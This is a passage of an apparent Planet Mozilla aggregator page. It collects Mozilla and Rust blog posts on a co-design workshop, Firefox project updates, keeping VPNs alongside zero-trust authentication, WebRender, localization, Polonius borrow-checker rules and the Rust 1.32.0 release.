  12. Share results (and ask for feedback) of analysis with Mozilla staff and participants

Lessons learned: What went well

Interview participants beforehand

We interviewed each participant before the workshop. The participants relayed their experience about submitting extensions and their motivations for creating extensions. They told us their stories, their challenges, and their successes.

Conducting these interviews beforehand helped our team in a few ways:

  • The interviews introduced the team and facilitators, helping to build rapport before the workshop.
  • The interviews gave the facilitators context into each participant’s experience. We learned about their motivations for creating extensions and themes as well as their thoughts about the submission process. This foundation of knowledge helped to shape the co-design workshop (including where to focus for pain points), and enabled us to prepare an introductory data summary for sharing at the workshop.
  • We asked for participants’ feedback about the draft content guidelines that our content strategist created to provide developers with support, examples, and writing exercises to optimize their product page content. Those guidelines were to be incorporated into the new submission flow, so it was very helpful to get early user feedback. It also gave the participants some familiarity with this deliverable so they could help incorporate it into the submission flow during the workshop.
A photo of Jennifer, user researcher, presenting interview results back to the participants, near the beginning of the workshop.

Thoughtfully select diverse participants

The Add-ons team has an excellent community manager, Caitlin Neiman, who interfaces with the greater Add-ons community. Working with Mozilla staff, she selected a diverse group of community participants for the workshop. The participants hailed from several different countries, some were paid to create extensions and some were not, and some had attended Mozilla events before and some had not. This careful selection of participants resulted in diverse perspectives, workflows, and motivations that positively impacted the workshop.

Create Ground Rules

Design sessions can benefit from a short introductory activity of establishing ground rules to get everyone on the same page and set the tone for the day. This activity is especially helpful when participants don’t know one another.

Using a flip chart and markers, we asked the room of participants to volunteer ground rules. We captured and reviewed those as a group.

A photo of Emanuela, UX Designer and facilitator, scribing ground rules on a flip chart.

Why are ground rules important?

Designing the rules together, with facilitators and participants, serves as a way to align the group with a set of shared values, detecting possible harmful group behaviors and proposing productive and healthy interactions. Ground rules help make everyone’s experience a more rich and satisfying one.

Assign roles and create diverse working groups during the workshop

The Mozilla UX team in Taipei recently conducted a participatory workshop with older adults. In their blog post, they also highlight the importance of creating diverse working groups for the workshops [4].

In our workshop, each group was comprised of:

  • multiple participants (i.e. extension and theme creators)
  • a Mozilla staff program manager, engineering manager, community manager, and/or engineer.
  • a facilitator who was either a Mozilla staff designer or program manager. As a facilitator, the designer was a neutral party in the group and could internalize participants’ mental models, workflows, and vocabulary through the experience.

We also assigned roles during group critique sessions. Each group member chose to be a dreamer (responds to ideas with a “Why not?” attitude), a realist (responds to ideas with “How?”), or a spoiler (responds to ideas by pointing out their flaws). This format is called the Walt Disney approach [5].

Post-its for each critique role: Realist, Spoiler, Dreamer

Why are critique roles important?

Everyone tends to fit into one of the Walt Disney roles naturally. Being pushed to adopt a role that may not be their tendency gets participants to step out of their comfort zone gently. The roles help participants empathize with other perspectives.

We had other roles throughout the workshop as well, namely, a “floater” who kept everyone on track and kept the workshop running, a timekeeper, and a photographer.

Ask for feedback about the workshop results

The “co” part of “co-design” doesn’t have to end when the workshop concludes. Using what we learned during the workshop, the Add-ons UX team created personas and potential new submission flow blueprints. We sent those deliverables to the workshop participants and asked for their feedback. As UX professionals, it was useful to close the feedback loop and make sure the deliverables accurately reflected the people and workflows being represented.

Lessons Learned: What could be improved

The workshop was too long

We flew from around the world to London to do this workshop. A lot of us were experiencing jet lag. We had breaks, coffee, biscuits, and lunch. Even so, going from 9 to 4, sketching for hours and iterating multiple times was just too much for one day.

Jorge, a product manager, provided feedback about the workshop’s duration. Image: “Jorge is done” text written above a skull and crossbones sketch.

We have ideas about how to fix this. One approach is to introduce a variety of tasks. In the workshop we mostly did sketching over and over again. Another idea is to extend the workshop across two days, and do a few hours each day. Another idea is to shorten the workshop and do fewer iterations.

There were not enough Mozilla staff engineers present

The workshop was developed by a user researcher, designers, and a content strategist. We included a community manager and program managers, but we did not include engineers in the planning process (other than providing updates). One of the engineering managers said that it would have been great to have engineers present to help with ideation and hear from creators first-hand. If we were to do a design workshop again, we would be sure to have a genuinely interdisciplinary set of participants, including more Mozilla staff engineers.

And with that…

We hope that this blog post helps you create a co-design workshop that is interdisciplinary, diverse, caring of participants’ perspectives, and just the right length.

Acknowledgements

Much gratitude to our colleagues who created the workshop with us and helped us edit this blog post! Thanks to Amy Tsay, Caitlin Neiman, Jorge Villalobos, Kev Needham, Stuart Colville, Mike Conca, and Gemma Petrie.

References

[1] Sanders, Elizabeth B-N., and Pieter Jan Stappers. “Co-creation and the new landscapes of design.” Co-design 4.1 (2008): 5–18.

[2] “How to Conduct a Cognitive Walkthrough.” The Interaction Design Foundation, 2018, www.interaction-design.org/literature/article/how-to-conduct-a-cognitive-walkthrough.

[3] Gray, Dave. “6-8-5.” Gamestorming, 2 June 2015, gamestorming.com/6-8-5s/.

[4] Hsieh, Tina. “8 Tips for Hosting Your First Participatory Workshop.” Medium.com, Firefox User Experience, 20 Sept. 2018, medium.com/firefox-ux/8-tips-for-hosting-your-first-participatory-workshop-f63856d286a0.

[5] “Disney Brainstorming Method: Dreamer, Realist, and Spoiler.” Idea Sandbox, idea-sandbox.com/blog/disney-brainstorming-method-dreamer-realist-and-spoiler/.



Firefox Nightly: These Weeks in Firefox: Issue 51

Highlights

Friends of the Firefox team

Introductions

  • New Student Project: Fluent Migrations (watch out for email)

Resolved bugs (excluding employees)

Project Updates

Add-ons / Web Extensions

  • Ongoing work on:
    • User opt-in for extensions in private browsing windows
    • Rebuilding about:addons in HTML
  • Old Lightweight Themes (LWTs) on addons.mozilla.org will be converted to XPI packaged themes next week

Browser Architecture

Developer Tools

Huge shoutout to the debugger community for all of their work during the winter break!

Console
Debugger
Layout Tools
Remote Debugging
Fission Support
Other

Fluent

  • New student project started up last week. Goals are:
    • convert more strings to Fluent
    • increase tool support
    • research porting the fluent-rs parser to wasm and replacing the JS Fluent parser with the wasm fluent-rs parser

Lint

Performance

  • In Q1 we are focusing our efforts on startup performance. This time we’ll care both about first paint performance (which already received optimization efforts previously and is close to parity with Chrome) and the time to render the home page.
  • Doug landed his document splitting work that should enable faster rendering and is investigating creating a warmup service to preload Firefox files when the OS starts.
  • Felipe’s tab animation patch is going through review.
  • The code of the old about:performance is gone (both front-end and back-end pieces) and some test coverage was added.
  • Gijs continued his browser adjustment work (adding telemetry and about:support visibility), improved Pocket’s startup behavior, and removed some more Feed code.
  • mconley is unblocking enabling the background process priority manager, by removing the HAL stuff that was leftover from FxOS.
  • Perf.html improvements deployed recently:
    • Tooltips in the thread activity graph indicating the meaning of colors (most frequent request we got during the all-hands!)
      • A tooltip is floating over the colour-coded visualization of processing time in perf.html. The tooltip describes what the hovered colour means.

        This was a top request from users of the Profiler!

    • Memory track
      • A new track in the perf.html profiler view shows a graph of memory usage during the recorded time.

        This should help us notice memory allocation patterns in profiles.

    • Category colors in the stack chart
      • The stack chart is now colour coded, using the same colouring system as the thread tracks.

        This should help people narrow down slow code to the responsible components.

Privacy/Security

  • We’re eliminating some interesting performance regressions from enabling cookie restrictions by default.
  • Erica is working on another Shield study on content blocking breakage
  • Baku refactored some of URL-Classifier to prepare it for future endeavors, including a neat new way to manually classify URLs on about:url-classifier

Search and Navigation

Search
Quantum Bar
Places

Julien Vehent: Maybe don't throw away your VPN just yet...

Over the past few years I've followed the rise of the BeyondCorp project, Google's effort to move away from perimetric network security to identity-based access controls. The core principle of BeyondCorp is to require strong authentication to access resources rather than relying on the source IP a connection originates from. Don't trust the network, authenticate all accesses, are requirements in a world where your workforce is highly distributed and connects to privileged resources from untrusted networks every day. They are also a defense against office and datacenter networks that are rarely secure enough for the data they have access to. BeyondCorp, and zero trust networks, are good for security.

This isn't new. Most modern organizations have completely moved away from trusting source IPs and rely on authentication to grant access to data. But BeyondCorp goes further by recommending that your entire infrastructure should have a foot on the Internet and protect access using strong authentication. The benefits of this approach are enormous: employees can be fully mobile and continue to access privileged resources, and compromising an internal network is no longer sufficient to compromise the entire organization.

As a concept, this is good. And if you're hosting on GCP or are willing to proxy your traffic through GCP, you can leverage their Identity and Access Proxy to implement these concepts securely. But what about everyone else? Should you throw away your network security and put all your security in the authentication layer of your applications? Maybe not...

At Mozilla, we've long adopted single sign on, first using SAML, nowadays using OpenID Connect (OIDC). Most of our applications, both public facing and internal, require SSO to protect access to privileged resources. We never trust the network and always require strong authentication. And yet, we continue to maintain VPNs to protect our most sensitive admin panels.

"How uncool", I hear you object, "and here we thought you were all about DevOps and shit". And you would be correct, but I'm also pragmatic, and I can't count the number of times we've had authentication bugs that let our red team or security auditors bypass authentication. The truth is, even highly experienced programmers and operators make mistakes and will let a bug disable or fail to protect part of that one super sensitive page you never want to leave open to the internet. And I never blame them because SSO/OAuth/OIDC are massively complex protocols that require huge libraries that fail in weird and unexpected ways. I've never reached the point where I fully trust our SSO, because we find one of those auth bypass every other month. Here's the catch: they never lead to major security incidents because we put all our admin panels behind a good old VPN.

Those VPNs that no one likes to use or maintain (me included) also provide a stable and reliable security layer that simply never fails. They are far from perfect, and we don't use them to authenticate users or grant access to resources, but we use them to cover our butts when the real authentication layer fails. So far, real world experience continues to support this model.

So, there, you have it: adopt BeyondCorp and zero trust networks, but also consider keeping your most sensitive resources behind a good old VPN (or an SSH jumphost, whatever works for you). VPNs are good at reducing your attack surface and adding an extra layer of protection to your infrastructure. You'll be thankful to have one the next time you find a bypass in your favorite auth library.

Mozilla GFX: WebRender newsletter #36

Hi everyone! This week’s highlight is Glenn’s picture caching work which almost landed about a week ago and landed again a few hours ago. Fingers crossed! If you don’t know what picture caching means and are interested, you can read about it in the introduction of this newsletter’s season 01 episode 28.
On a more general note, the team continues focusing on the remaining list of blocker bugs which grows and shrinks depending on when you look, but the overall trend is looking good.

Without further ado:

Notable WebRender and Gecko changes

  • Bobby fixed unbounded interner growth.
  • Bobby overhauled the memory reporter.
  • Bobby added a primitive highlighting debug tool.
  • Bobby reduced code duplication around interners.
  • Matt and Jeff continued investigating telemetry data.
  • Jeff removed the minimum blob image size, yielding nice improvements on some talos benchmarks (18% raptor-motionmark-animometer-firefox linux64-qr opt and 7% raptor-motionmark-animometer-firefox windows10-64-qr opt).
  • kvark fixed a crash.
  • kvark reduced the number of vector allocations.
  • kvark improved the chasing debugging tool.
  • kvark fixed two issues with reference frame and scrolling.
  • Andrew fixed an issue with SVGs that embed raster images not rendering correctly.
  • Andrew fixed a mismatch between the size used during decoding images and the one we pass to WebRender.
  • Andrew fixed a crash caused by an interaction between blob images and shared surfaces.
  • Andrew avoided scene building caused by partially decoded images when possible.
  • Emilio made the build system take care of generating the ffi bindings automatically.
  • Emilio fixed some clipping issues.
  • Glenn optimized how picture caching handle world clips.
  • Glenn fixed picture caching tiles being discarded incorrectly.
  • Glenn split primitive preparation into a separate culling pass.
  • Glenn fixed some invalidation issues.
  • Glenn improved display list correlation.
  • Glenn re-landed picture caching.
  • Doug improved the way we deal with document splitting to allow more than two documents.

Ongoing work

The team keeps going through the remaining blockers (14 P2 bugs and 29 P3 bugs at the time of writing).

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

Mozilla Localization (L10N): L10n report: January edition

Welcome!

New localizers

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

New content and projects

What’s new or coming up in Firefox desktop

The localization cycle for Firefox 66 in Nightly is approaching its end, and Tuesday (Jan 15) was the last day to get changes into Firefox 65 before it moves to release (Jan 29). These are the key dates for the next cycle:

  • January 28: Nightly will be bumped to version 67.
  • February 26: deadline to ship updates to Beta (Firefox 66).

As of January, localization of the Pocket add-on has moved back into the Firefox main project. That’s a positive change for localization, since it gives us a clearer schedule for updates, while before they were complex and sparse. All existing translations from the stand-alone process were imported into Mercurial repositories (and Pontoon).

In terms of prioritization, there are a couple of features to keep an eye on:

  • Profile per installation: with Firefox 67, Firefox will begin using a dedicated profile for each Firefox version (including Nightly, Beta, Developer Edition, and ESR). This will make Firefox more stable when switching between versions on the same computer and will also allow you to run different Firefox installations at the same time. This introduces a set of dialogs and web pages to warn the user about the change, and explain how to sync data between profiles. Unlike other features, this targets all versions, but Nightly users in particular, since they are more likely to have multiple profiles according to Telemetry data. That’s a good reason to prioritize these strings.
  • Security error pages: nothing is more frustrating than being unable to reach a website because of certificate issues. There are a lot of experiments happening around these pages and the associated user experience, both in Beta and Release, so it’s important to prioritize translations for these strings (they’re typically in netError.dtd).

What’s new or coming up in Test Pilot

As explained in this blog post, Test Pilot is reaching its end of life. The website localization has been updated in Pontoon to include messages around this change, while other experiments (Send, Monitor) will continue to exist as stand-alone projects. Screenshots is also going to see changes in the upcoming days, mostly on the server side of the project.

What’s new or coming up in mobile

Just like for Firefox desktop, the last day to get in localizations for Fennec 65 was Tuesday, Jan 15. Please see the desktop section above for more details.

Firefox iOS v15 localization deadline was Friday, January 11. The app should be released to everyone by Jan 29th, after a phased roll-out. This time around we’ve added seven new locales: Angika, Burmese, Corsican, Javanese, Nepali, Norwegian Bokmål and Sundanese. This means that we’re currently shipping 87 locales out of the 88 that are being localized – twice as many as when we first shipped the app. Congrats to all the volunteer localizers involved in this effort over the years!

And stay tuned for an update on the upcoming v16 l10n timeline soon.

We’re also still working with the Lockbox Android team to get the project plugged into Pontoon, and you can expect to see something come up in the next couple of weeks.

The Firefox Reality project is also going to be open for localization very soon. We’re working out the specifics right now, and the timeline will be shared once everything is ironed out.

What’s new or coming up in web projects

Mozilla.org has a few updates.

  • Navigation bar: The new navigation.lang file contains strings for the redesigned navigation bar. When the language completion rate reaches 80%+, the new layout will be switched on. Try to get your locale completed by the time it is switched over.
  • Content Blocking Tour with updated UIs will go live on 29 Jan. Catch up on all the updates by completing the firefox/tracking-protection-tour.lang file before then.

What’s new or coming up in Foundation projects

Mozilla’s big end-of-year push for donations has passed, and thanks in no small part to your efforts, the Foundation’s financial situation is in much better shape this year, letting them pick up the fight where they left off before the break. Thank you all for your help!

In these first days of 2019, the fundraising team is taking advantage of the quiet time to modernize the donation receipts, with a better email sent to donors, and to migrate the receipts to the same infrastructure used to send the Mozilla & Firefox newsletters. Content for the new receipts should be exposed in the Fundraising project by the end of the month for the 10-15 locales with the most donations in 2018.

The Advocacy team is still working on the misinfo campaign in Europe, with a first survey coming up, to be sent to people subscribed to the Mozilla newsletter, to get a sense of their current attitudes toward misinformation. Next steps will include launching a campaign about political ads ahead of the EU elections, then promoting anti-disinformation tools. Let’s do this!

What’s new or coming up in Support

What’s new or coming up in Pontoon

We re-launched the ability to delete translations. First you need to reject a translation, then click on the trash can icon, which only appears next to rejected translations. The delete functionality had previously been replaced by the reject functionality, but over time it became obvious that there are use cases where both features need to co-exist. See bug 1397377 for more details about why we first removed and then restored this feature.

Events

  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include it (see links to emails at the bottom of this report).

Friends of the Lion

Image by Elio Qoshi

  • Sofwath came to us right after the new year holiday break through the Common Voice project. As the locale manager of Dhivehi, the official language of Maldives, he gathered all the necessary information in order to onboard several new contributors. Together, they almost completed the website localization in a matter of days. They are already looking into public government sources for sentence collection. Kudos to the entire community!


Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Niko MatsakisPolonius and region errors

Now that NLL has been shipped, I’ve been doing some work revisiting the Polonius project. Polonius is the project that implements the “alias-based formulation” described in my older blogpost. Polonius has come a long way since that post; it’s now quite fast and also experimentally integrated into rustc, where it passes the full test suite.

However, polonius as described is not complete. It describes the core “borrow check” analysis, but there are a number of other checks that the current implementation performs which polonius ignores:

  • Polonius does not account for moves and initialization.
  • Polonius does not check for relations between named lifetimes.

This blog post is focused on the second of those bullet points. It covers the simple cases; hopefully I will soon post a follow-up that targets some of the more complex cases that can arise (specifically, dealing with higher-ranked things).

Brief Polonius review

If you’ve never read the original Polonius post, you should probably do so now. But if you have, let me briefly review some of the key details that are relevant to this post:

  • Instead of interpreting the 'a notation as the lifetime of a reference (i.e., a set of points), we interpret 'a as a set of loans. We refer to 'a as a “region”1 in order to emphasize this distinction.
  • We call 'a: 'b a subset relation; it means that the loans in 'a must be a subset of the loans in 'b. We track the required subset relations at each point in the program.
  • A loan comes from some borrow expression like &foo. A loan L0 is “live” if some live variable contains a region 'a whose value includes L0. When a loan is live, the “terms of the loan” must be respected: for a shared borrow like &foo, that means the path that was borrowed (foo) cannot be mutated. For a mutable borrow, it means that the path that was borrowed cannot be accessed at all.
    • If an access occurs that violates the terms of a loan, that is an error (see the short example after this list).
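
To make that concrete, here is a minimal Rust sketch (not taken from the post) of the kind of "illegal access" error these rules already catch: a shared loan of v is still live when v is mutated.

fn main() {
    let mut v = vec![1, 2, 3];
    let r = &v[0];     // a loan of `v`, created by a shared borrow
    v.push(4);         // ERROR: mutating `v` violates the terms of that loan
    println!("{}", r); // the loan is live here because `r` is still used
}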

Running Example 1

Let’s give a quick example of some code that should result in an error, but which would not if we only considered the errors that polonius reports today:

fn foo<'a, 'b>(x: &'a [u32], y: &'b [u32]) -> &'a u32 {
    &y[0]
}

Here, we declared that we are returning a &u32 with lifetime 'a (i.e., borrowed from x) but in fact we are returning data with lifetime 'b (i.e., borrowed from y).

Slightly simplified, the MIR for this function looks something like this.

fn foo(_1: &'a [u32], _2: &'b [u32]) -> &'a u32 {
  _0 = &'X (*_2)[const 0usize]; // S0
  return;                       // S1
}  

As you can see, there’s only really one interesting statement; it borrows from _2 and stores the result into _0, which is the special “return slot” in MIR.

In the case of the parameters _1 and _2, the regions come directly from the method signature. For regions appearing in the function body, we create fresh region variables – in this case, only one, 'X. 'X represents the region assigned to the borrow.

The relevant polonius facts for this function are as follows:

  • base_subset('b, 'X, mid(S0)) – as described in the NLL RFC, “re-borrowing” the referent of a reference (i.e., *_2) creates a subset relation between the region of the reference (here, 'b) and the region of the borrow (here, 'X). Written in the notation of the NLL RFC, this would be the relation 'X: 'b @ mid(S0).
  • base_subset('X, 'a, mid(S0)) – the borrow expression in S0 produces a result of type &'X u32. This is then assigned to _0, which has the type &'a u32. The subtyping rules require that 'X: 'a.

Combining the two base_subset relations allows us to conclude that the full subset relation includes subset('b, 'a, mid(S0)) – that is, for the function to be valid, the region 'b must be a subset of the region 'a. This is an error because the regions 'a and 'b are actually parameters to foo; in other words, foo must be valid for any set of regions 'a and 'b, and hence we cannot know if there is a subset relationship between them. This is a different sort of error than the “illegal access” errors that Polonius reported in the past: there is no access at all, in fact, simply subset relations.

Placeholder regions

There is an important distinction between named regions like 'a and 'b and the region 'X we created for a borrow. The definition of foo has to be true for all regions 'a and 'b, but for a region like 'X there only has to be some valid value. This difference is often called being universally quantified (true for all regions) versus existentially quantified (true for some region).

In this post, I will call universally quantified regions like 'a and 'b “placeholder” regions. This is because they don’t really represent a known quantity of loans, but rather a kind of “placeholder” for some unknown set of loans.

We will include a base fact that helps us to identify placeholder regions:

.decl placeholder_region(R1: region)
.input placeholder_region

This fact is true for any placeholder region. So in our example we might have

placeholder_region('a).
placeholder_region('b).

Note that the actual polonius impl already includes a relation like this2, because we need to account for the fact that placeholder regions are “live” at all points in the control-flow graph, as we always assume there may be future uses of them that we cannot see.

Representing known relations

Even placeholder regions are not totally unknown though. The function signature will often include where clauses (or implied bounds) that indicate some known relationships between placeholder regions. For example, if foo included a where clause like where 'b: 'a, then it would be perfectly legal.
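
For concreteness, here is a sketch of the running example with such a where clause added; with the declared relationship in place, returning data borrowed from y is accepted:

fn foo<'a, 'b>(x: &'a [u32], y: &'b [u32]) -> &'a u32
where
    'b: 'a, // the declared ("known") subset relation
{
    &y[0]
}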

We can represent the known relationships using an input:

.decl known_base_subset(R1: region, R2: region)
.input known_base_subset

Naturally these known relations are transitive, so we can define a known_subset rule to encode that:

.decl known_subset(R1: region, R2: region)

known_subset(R1, R2) :- known_base_subset(R1, R2).
known_subset(R1, R3) :- known_base_subset(R1, R2), known_subset(R2, R3).

In our example of foo, there are no where clauses nor implied bounds, so these relations are empty. If there were a where clause like where 'b: 'a, however, then we would have a known_base_subset('b, 'a) fact. Similarly, per our implied bounds rules, such an input fact might be derived from an argument with a type like &'a &'b u32, where there are ‘nested’ regions.
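
As a small, hypothetical illustration of that last point (the function name is made up), an implied bound from a nested reference type is enough on its own:

// The well-formedness of `&'a &'b u32` implies `'b: 'a`, so no explicit
// where clause is needed for this to compile.
fn nested<'a, 'b>(r: &'a &'b u32) -> &'a u32 {
    *r
}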

Detecting illegal subset relations

We can now extend the polonius rules to report errors for cases like our running example. The basic idea is this: if the function requires a subset relationship 'r1: 'r2 between two placeholder regions 'r1 and 'r2, then it must be a “known subset”, or else we have an error. We can encode this like so:

.decl subset_error(R1: region, R2: region, P:point)

subset_error(R1, R2, P) :-
  subset(R1, R2, P),      // `R1: R2` required at `P`
  placeholder_region(R1), // `R1` is a placeholder
  placeholder_region(R2), // `R2` is also a placeholder
  !known_subset(R1, R2).  // `R1: R2` is not a "known subset" relation.

In our example program, we can clearly derive subset_error('b, 'a, mid(S0)), and hence we have an error:

  • we saw earlier that subset('b, 'a, mid(S0)) holds
  • as 'a is a placeholder region, placeholder_region('a) will appear in the input (same for 'b)
  • finally, the known_base_subset (and hence known_subset) relation in our example is empty

Sidenote on negative reasoning and stratification. This rule makes use of negative reasoning in the form of the !known_subset(R1, R2) predicate. Negative reasoning is fine in datalog so long as the program is “stratified” – in particular, we must be able to compute the entire known_subset relation without having to compute subset_error. In this case, the program is trivially stratified: known_subset depends only on the input relation known_base_subset.

Observation about borrowing local data

It is interesting to walk through a different example. This is another case where we expect an error, but in this case the error arises because we are returning a reference to the stack:

fn bar<'a>(x: &'a [u32]) -> &'a u32 {
    let stack_slot = x[0];
    &stack_slot
}

Polonius will report an error for this case, but not because of the mechanisms in this blog post. What happens instead is that we create a loan for the borrow expression &stack_slot, we’ll call it L0. When the borrow is returned, this loan L0 winds up being a member of the 'a region. It is therefore “live” when the storage for stack_slot is popped from the stack, which is an error: you can’t pop the storage for a stack slot while there are live loans that reference it.

Conclusion

This post describes a simple extension to the polonius rules that covers errors arising from subset relations. Unlike the prior rules, these errors are not triggered by any “access”, but rather simply the creation of a (transitive) subset relation between two placeholder regions.

Unfortunately, this is not the complete story around region checking errors. In particular, this post ignored subset relations that can arise from “higher-ranked” types like for<'a> fn(&'a u32). Handling these properly requires us to introduce a bit more logic and will be covered in a follow-up.

Comments, if any, should be posted in the internals thread dedicated to my previous polonius post.

Appendix: A (potentially) more efficient formulation

The subset_error formulation above relied on the transitive subset relation to work, because we wanted to report errors any time that one placeholder wound up being forced to be a subset of another. In the more optimized polonius implementations, we don’t compute the full transitive relation, so it might be useful to create a new relation subset_placeholder that is specific to placeholder regions:

.decl subset_placeholder(R1: region, R2: region, P:point)

The idea is that subset_placeholder(R1, R2, P) means that, at the point P, we know that R1: R2 must hold, where R1 is a placeholder. You can express this via a “base” rule:

subset_placeholder(R1, R2, P) :-
  subset(R1, R2, P),      // `R1: R2` required at `P`
  placeholder_region(R1). // `R1` is a placeholder

and a transitive rule:

subset_placeholder(R1, R3, P) :-
  subset_placeholder(R1, R2, P), // `R1: R2` at P where `R1` is a placeholder
  subset(R2, R3, P).      // `R2: R3` required at `P`

Then we reformulate the subset_error rule to be based on subset_placeholder:

.decl subset_error(R1: region, R2: region, P:point)

subset_error(R1, R2, P) :-
  subset_placeholder(R1, R2, P), // `R1: R2` required at `P`
  placeholder_region(R2), // `R2` is also a placeholder
  !known_subset(R1, R2).  // `R1: R2` is not a "known subset" relation.

Footnotes

  1. The term “region” is not an especially good fit, but it’s common in academia.

  2. Currently called universal_region, though I plan to rename it.

The Rust Programming Language BlogAnnouncing Rust 1.32.0

The Rust team is happy to announce a new version of Rust, 1.32.0. Rust is a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.32.0 is as easy as:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.32.0 on GitHub.

As a small side note, rustup has seen some new releases lately! To update rustup itself, run rustup self update.

What's in 1.32.0 stable

Rust 1.32.0 has a few quality of life improvements, switches the default allocator, and makes additional functions const. Read on for a few highlights, or see the detailed release notes for additional information.

The dbg macro

First up, a quality of life improvement. Are you a "print debugger"? If you are, and you've wanted to print out some value while working on some code, you have to do this:

let x = 5;

println!("{:?}", x);

// or maybe even this
println!("{:#?}", x);

This isn't the largest speed bump, but it is a lot of stuff to simply show the value of x. Additionally, there's no context here. If you have several of these println!s, it can be hard to tell which is which, unless you add your own context to each invocation, requiring even more work.

In Rust 1.32.0, we've added a new macro, dbg!, for this purpose:

fn main() {
    let x = 5;
    
    dbg!(x);
}

If you run this program, you'll see:

[src/main.rs:4] x = 5

You get the file and line number of where this was invoked, as well as the name and value. Additionally, println! prints to the standard output, so you really should be using eprintln! to print to standard error. dbg! does the right thing and goes to stderr.

It even works in more complex circumstances. Consider this factorial example:

fn factorial(n: u32) -> u32 {
    if n <= 1 {
        n
    } else {
        n * factorial(n - 1)
    }
}

If we wanted to debug this, we might write it like this with eprintln!:

fn factorial(n: u32) -> u32 {
    eprintln!("n: {}", n);

    if n <= 1 {
        eprintln!("n <= 1");

        n
    } else {
        let n = n * factorial(n - 1);

        eprintln!("n: {}", n);

        n
    }
}

We want to log n on each call, as well as have some kind of context for each of the branches. We see this output for factorial(4):

n: 4
n: 3
n: 2
n: 1
n <= 1
n: 2
n: 6
n: 24

This is serviceable, but not particularly great. Maybe we could work on how we print out the context to make it more clear, but now we're not debugging our code, we're figuring out how to make our debugging code better.

Consider this version using dbg!:

fn factorial(n: u32) -> u32 {
    if dbg!(n <= 1) {
        dbg!(1)
    } else {
        dbg!(n * factorial(n - 1))
    }
}

We simply wrap each of the various expressions we want to print with the macro. We get this output instead:

[src/main.rs:3] n <= 1 = false
[src/main.rs:3] n <= 1 = false
[src/main.rs:3] n <= 1 = false
[src/main.rs:3] n <= 1 = true
[src/main.rs:4] 1 = 1
[src/main.rs:5] n * factorial(n - 1) = 2
[src/main.rs:5] n * factorial(n - 1) = 6
[src/main.rs:5] n * factorial(n - 1) = 24
[src/main.rs:11] factorial(4) = 24

Because the dbg! macro returns the value of what it's debugging, instead of eprintln! which returns (), we need to make no changes to the structure of our code. Additionally, we have vastly more useful output.
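
As a tiny made-up example of that pass-through behavior, dbg! can wrap a sub-expression right where it appears:

fn main() {
    let x = 5;
    // dbg! evaluates to its argument, so it can sit in the middle of an
    // expression without restructuring the surrounding code.
    let y = dbg!(x * 2) + 1; // prints something like: [src/main.rs:5] x * 2 = 10
    assert_eq!(y, 11);
}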

That's a lot to say about a little macro, but we hope it improves your debugging experience! We are continuing to work on support for gdb and friends as well, of course.

jemalloc is removed by default

Long, long ago, Rust had a large, Erlang-like runtime. We chose to use jemalloc instead of the system allocator, because it often improved performance over the default system one. Over time, we shed more and more of this runtime, and eventually almost all of it was removed, but jemalloc was not. We didn't have a way to choose a custom allocator, and so we couldn't really remove it without causing a regression for people who do need jemalloc.

Also, saying that jemalloc was always the default is a bit UNIX-centric, as it was only the default on some platforms. Notably, the MSVC target on Windows has shipped the system allocator for a long time.

Finally, while jemalloc usually has great performance, that's not always the case. Additionally, it adds about 300kb to every Rust binary. We've also had a host of other issues with jemalloc in the past. It has also felt a little strange that a systems language does not default to the system's allocator.

For all of these reasons, once Rust 1.28 shipped a way to choose a global allocator, we started making plans to switch the default to the system allocator, and allow you to use jemalloc via a crate. In Rust 1.32, we've finally finished this work, and by default, you will get the system allocator for your programs.

If you'd like to continue to use jemalloc, use the jemallocator crate. In your Cargo.toml:

[dependencies]
jemallocator = "0.1.8"

And in your crate root:

#[global_allocator]
static ALLOC: jemallocator::Jemalloc = jemallocator::Jemalloc;

That's it! If you don't need jemalloc, it's not forced upon you, and if you do need it, it's a few lines of code away.

Final module improvements

In the past two releases, we announced several improvements to the module system. We have one last tweak landing in 1.32.0 and the 2018 edition. Nicknamed "uniform paths", it permits previously invalid import path statements to be resolved exactly the same way as non-import paths. For example:

enum Color { Red, Green, Blue }

use Color::*;

This code did not previously compile, as use statements had to start with super, self, or crate. Now that the compiler supports uniform paths, this code will work, and do what you probably expect: import the variants of the Color enum defined above the use statement.

With this change in place, we've completed our efforts at revising the module system. We hope you've been enjoying the simplified system so far!

Macro improvements

A few improvements to macros have landed in Rust 1.32.0. First, a new literal matcher was added:

macro_rules! m {
    ($lt:literal) => {};
}

fn main() {
    m!("some string literal");
}

literal matches against literals of any type: string literals, numeric literals, char literals.

In the 2018 edition, macro_rules macros can also use ?, like this:

macro_rules! bar {
    ($(a)?) => {}
}

The ? will match zero or one repetitions of the pattern, similar to the already-existing * for "zero or more" and + for "one or more."
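
For example (a trivial made-up usage, on the 2018 edition), both of these invocations match the pattern above:

macro_rules! bar {
    ($(a)?) => {};
}

fn main() {
    bar!();  // zero occurrences of `a`
    bar!(a); // one occurrence of `a`
}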

Library stabilizations

We talked above about the dbg! macro, which is a big library addition. Beyond that, 19 functions were made const fns, and all integral numeric primitives now provide conversion functions to and from byte-arrays with specified endianness. These six functions are named to_<endian>_bytes and from_<endian>_bytes, where <endian> is one of:

  • ne - native endianness
  • le - little endian
  • be - big endian
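
A quick hypothetical sketch of these conversions in practice (the values are arbitrary):

fn main() {
    let n: u32 = 0x1234_5678;
    // to_le_bytes (and to_be_bytes / to_ne_bytes) produce fixed-size arrays...
    assert_eq!(n.to_le_bytes(), [0x78, 0x56, 0x34, 0x12]);
    // ...and the matching from_*_bytes functions reverse the conversion.
    assert_eq!(u32::from_be_bytes([0x12, 0x34, 0x56, 0x78]), n);
}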

See the detailed release notes for more details.

Cargo features

Cargo gained cargo c as an alias for cargo check, and now allows usernames in registry URLs.

See the detailed release notes for more.

Contributors to 1.32.0

Many people came together to create Rust 1.32.0. We couldn't have done it without all of you. Thanks!

Nick Cameronproc-macro-rules

